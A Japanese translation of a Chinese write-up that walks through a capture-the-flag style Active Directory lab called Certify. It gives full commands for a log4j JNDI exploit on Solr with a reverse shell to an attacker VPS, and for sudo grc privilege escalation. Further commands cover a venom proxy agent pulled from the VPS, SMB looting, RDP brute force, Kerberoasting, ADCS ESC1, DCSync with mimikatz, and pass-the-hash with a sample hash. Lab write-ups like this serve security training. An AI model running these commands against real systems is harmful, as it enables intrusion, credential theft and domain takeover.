banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
ホームアーカイブ图文

春秋云鏡靶場--Certify記録

#渗透测试#内网渗透#靶场#提权#工具#网络安全##漏洞复现605
AI 翻訳
この記事はAIを通じて中国語から日本語に翻訳されました。原文を表示
AI が生成した要約
Certify靶场是一个中等难度的环境,旨在帮助玩家了解内网渗透技术。玩家需要完成4个flag,包括使用nmap扫描、利用log4j漏洞获取shell、提权至root用户、上传fscan扫描等步骤。最终通过爆破获取密码,成功访问rdp连接。

[[仿真靶场 - Certify]]#

靶场紹介#

Certify は中程度の難易度の靶場環境であり、この挑戦を完了することで、プレイヤーは内部ネットワーク侵入におけるプロキシ転送、内部スキャン、情報収集、特権昇格、横移動技術方法を理解し、ドメイン環境のコア認証メカニズムに対する理解を深め、ドメイン環境侵入におけるいくつかの興味深い技術的ポイントを習得することができます。この靶場には 4 つのフラグがあり、異なる靶機に分布しています。

  • Solr
  • AD CS
  • SMB
  • Kerberos
  • ドメイン侵入

解題手順#

最初のフラグ#

nmap スキャン

image

80 ポートスキャンディレクトリは無結果

nmap 全ポートスキャン

image

http://39.99.234.17:8983/solr/#/ にアクセスすると、solr インターフェースが表示され、log4j の脆弱性が存在する可能性があります

image

http://39.99.234.17:8983/solr/admin/info/system?_=${jndi:ldap://1fed89d19d.ipv6.1433.eu.org}&wt=jsonにアクセスして dnslog にアクセスできるかテストします。以下のように、アクセス可能であり、log4j の脆弱性が存在する可能性があります

image

シェルをリバウンド

JNDI を利用してシェルを返します。vps 上で

image

同時に vps でリスニングを開始

nc -lvnp 1234

image

ldap://x.x.x.x:1389/Basic/ReverseShell/vpsのipアドレス/1234

リクエストを送信し、シェルを成功裏に返します

image

solr ユーザーはフラグを見つけられず、root ユーザーに昇格する必要があります

sudo -l で、sudo 権限で実行されるファイルを確認し、/usr/bin/grcファイルを見つけ、root パスワードを入力せずに root 権限で実行できます

image

直接/usr/bin/grcファイルを実行すると、出力は以下のようになります。--pty パラメータに注意してください

image

https://gtfobins.github.io/gtfobins/grc/ サイトで grc 昇格方法を見つけることができます

image

sudo grc --pty /bin/sh

image

最初のフラグを取得

image

二つ目のフラグ#

サーバーの ip を確認します。solr サーバーの ip アドレスは:172.22.9.19

image

fscan スキャンをアップロード

image

スキャン後の情報を整理すると以下のようになります:

172.22.9.7 XIAORANG\XIAORANG-DC #dcサーバー
172.22.9.26 #ドメイン内マシン
172.22.9.47 #ファイルサーバー
172.22.9.19 #solrサーバー

注意:他の人の wp を見て、ここにサーバーが一台足りないことに気づきました。後の二つのフラグは取得できません

内部ネットワークトラフィックをプロキシして、venomを使用してプロキシします

1、vps でリスニング

./admin_linux_x64 -lport 9999

image

2、同時に、vps で web サービスを開始

python3 -m http.server

3、solr 靶機でエージェントをダウンロード

wget http://vpsのipアドレス:8000/agent_linux_x64

4、靶機で venom のエージェントを実行し、サーバーに接続

./agent_linux_x64 -rhost vpsのipアドレス -rport 9999

image

socks プロキシを開始

image

まずファイルサーバーを見て、ファイル共有が存在するかテストします

kali で /etc/proxychains4.conf ファイルを変更し、プロキシサーバーを設定します

nmap スキャン

proxychains -q nmap -sT -A 172.22.9.47

image

proxychains smbclient \\\\172.22.9.47\\fileshare

image

get personnel.db 
get secret\flag02.txt

image

二つ目のフラグを取得

image

ヒント:はい、あなたは smb を列挙しました。しかし、SPN が何であるか知っていますか?(確かに、あなたは smb について言及しました。しかし、SPN の意味を知っていますか?)

三つ目のフラグ#

personnel.db ファイルを確認すると、いくつかのユーザー名とパスワードが見つかります

image

image

ユーザー名とパスワードをエクスポートし、hydra で rdp をブルートフォースします。2 つのアカウントをブルートフォースしましたが、ログインできません

proxychains hydra -L user.txt -P pwd.txt 172.22.9.26 rdp -vV

image

image

エラーが表示され、アカウントは有効かもしれませんが、リモートデスクトップ機能が有効になっていないようです。

flag02 のヒントに従い(確かに、あなたは smb について言及しました。しかし、SPN の意味を知っていますか?)

ドメインユーザーの spn を取得します

proxychains -q python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian

hydra でブルートフォースしたパスワードを入力します

image

krb5tgs の Kerberos TGS-REP(チケット授与サービス応答)チケットのハッシュを取得しました

hashcat でブルートフォースします

hashcat -m 13100 -a 0 hash.txt wordlist.txt

zhangxia と chenchen のパスワードがブルートフォースされました

image

パスワードは以下の通りです:

MyPass2@@6
@Passw0rd@

rdp 接続

 proxychains xfreerdp /u:"[email protected]" /v:172.22.9.26:3389

image

172.22.9.26 の rdp に成功裏にアクセスしました

image

administrator ディレクトリにアクセスできず、フラグはこのディレクトリにあります

四つ目のフラグ#

ADCS ESC1#

参考:
https://book.hacktricks.xyz/v/cn/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
https://book.hacktricks.xyz/v/cn/windows-hardening/active-directory-methodology/ad-certificates/account-persistence

Certify ファイルをダウンロードし、172.22.9.26 にアップロードします

Certify ダウンロード:https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

以下のコマンドを実行します:

#脆弱な証明書テンプレートを探す
Certify.exe find /vulnerable

image

msPKI-Certificate-Name-Flag: (0x1) ENROLLEE_SUPPLIES_SUBJECT フラグが設定された証明書テンプレートを確認し、この脆弱性を利用して管理者を偽装します

image

注:しかし、実行後にエラーが発生し、調査の結果、この環境にはまだ起動していないサーバーがあり、172.22.9.13、このサーバーは CA サーバーであり、後で何度も再試行しましたが、起動しませんでした。

image

通常、このステップではドメイン管理者のために証明書を申請し、証明書ファイルを出力できます。その後、証明書形式を.pfx 形式に変換します。

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

次に、Rubeus または certipy を使用して認証します

Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password: /ptt

チケットを取得した後、ハッシュをエクスポートします

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

上記のコマンドを実行すると、ドメイン内のユーザーとドメイン管理者のハッシュを取得できます。

ハッシュ転送#

ハッシュがあれば、ハッシュ転送を行い、ドメイン内のユーザー権限を取得できます

proxychains crackmapexec smb 172.22.9.26 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

image

同様の方法で 172.22.9.7(ドメイン管理者の権限)を取得します

proxychains crackmapexec smb 172.22.9.7 -u administrator -H00000000000000000000000000000000:2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type c:\Users\Administrator\flag\flag04.txt"

image

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。